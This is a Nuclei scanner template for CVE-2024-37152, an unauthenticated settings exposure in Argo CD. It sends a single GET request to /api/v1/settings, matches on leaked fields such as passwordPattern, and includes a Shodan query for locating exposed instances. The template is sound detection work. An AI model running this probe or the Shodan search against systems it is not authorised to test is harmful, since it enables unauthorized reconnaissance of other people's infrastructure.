id: CVE-2024-37152 info: name: Argo CD Unauthenticated Access to sensitive setting author: DhiyaneshDk severity: medium description: | Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. The vulnerability allows unauthorized access to the sensitive settings exposed by /api/v1/settings endpoint without authentication. All sensitive settings are hidden except passwordPattern. reference: - https://github.com/argoproj/argo-cd/security/advisories/GHSA-87p9-x75h-p4j2 - https://nvd.nist.gov/vuln/detail/CVE-2024-37152 classification: cpe: cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: argoproj product: argo_cd shodan-query: html:"Argo CD" tags: cve,cve2024,argo-cd,info-leak http: - raw: - | GET /api/v1/settings HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - '"passwordPattern":' - '"appLabelKey":' condition: and - type: word part: content_type words: - 'application/json' - type: status status: - 200 # digest: 4a0a0047304502206ef1615be1add9ac1a4abf671e665c7fed21157c0f0265605dbe4e874efb9472022100f646a335e4cecf978f09221b5d72a7c482e25574d5cafb9132b4b8eee0e41626:922c64590222798bb761d5b6d8e72950